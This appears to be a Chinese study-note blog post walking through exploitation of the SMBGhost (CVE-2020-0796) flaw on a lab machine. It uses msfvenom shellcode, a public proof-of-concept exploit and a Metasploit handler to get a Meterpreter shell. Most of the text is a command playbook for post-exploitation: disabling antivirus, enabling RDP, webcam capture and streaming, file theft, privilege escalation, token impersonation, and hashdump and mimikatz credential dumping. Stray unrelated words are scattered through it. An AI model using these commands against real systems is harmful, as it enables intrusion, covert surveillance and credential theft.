通過對靶機的掃描探測,發現靶機存在CVE-2020-0796漏洞(靶機至少分4G內存,要不會藍屏...)javascript
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt
將shellcode.txt文本中內容替換exp(https://github.com/chompie1337/SMBGhost_RCE_PoC)中exploit.py中的USER_PAYLOAD。java
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcppayload => windows/x64/meterpreter/bind_tcpmsf5 exploit(multi/handler) > set rhost 10.10.1.22rhost => 10.10.1.22msf5 exploit(multi/handler) > set lport 4445lport => 4445msf5 exploit(multi/handler) > exploit
python3 /home/guolala/桌面/SMBGhost_RCE_PoC-master/exploit.py -ip 10.10.1.22
成功反彈shellpython
剛得到Meterpreter shell時,該shell是很容易被發現的,因此第一步要把它和目標機中的一個穩定的進程綁定在一塊兒。
獲取當前Meterpreter shell進行PID 。
getipd
自動尋找合適的進程,而後遷移。
nginx
run post/windows/manage/migrate
也能夠使用migrate遷移到指定的進程。git
sysinfo查看目標機的系統信息
Sysinfo
查看機器運行時間github
Idletime
查看路由信息web
route
查看當前滲透成功的用戶名shell
getuid
列舉當前登陸用戶
windows
run post/windows/gather/enum_logged_on_users
列舉應用程序
微信
run post/windows/gather/enum_applications
檢查是否爲虛擬機
run post/windows/gather/checkvm
關閉殺毒軟件
run post/windows/manage/killav
開啓遠程桌面
run post/windows/manage/enable_rdp
進入目標機shell
shell
加載Espia插件
Load espia
截屏
screengrab
查看有沒有攝像頭
webcam_list
打開攝像頭,使用攝像頭抓取一張照片。
Webcam_snap
開啓直播模式
Webcam_stream
查看當前工做目錄
Pwd
查看當前所在目錄
Getlwd
列出當前目錄文件
Ls
搜索文件
search -f *.txt -d c:/111
下載指定文件
download c:/111/test.txt
上傳文件到指定目錄
upload /home/guolala/桌面/password.txt c:/111
先進入shell
若是出現亂碼,鍵入:
chcp 65001
查看咱們當前的權限
whoami /groups
系統查看命令查看補丁安裝狀況
systeminfo
使用WMIC列出補丁
Wmic qfe get Caption,Description,HotFixID,InstalledOn
自動提權命令
getsystem
加載incognito插件
use incognito
列出可用的token
list_tokens -u
令牌假冒,假冒guolala用戶的令牌
impersonate_token DESKTOP-4SU3VVU\\guolala
使用hashdump抓取密碼
Hashdump
使用smart_hashdump導出全部用戶的hash到文件
run windows/gather/smart_hashdump
加載mimikatz插件
load mimikatz
抓取系統hash值
Msv
抓取系統票據
Kerberos
抓取系統帳戶信息
wdigest
抓取hash(沒抓成功,可能win10不支持)
mimikatz_command -f samdump::hashes
查看進程
mimikatz_command -f handle::list
本文分享自微信公衆號 - 小啦的學習筆記(woshiguolala)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。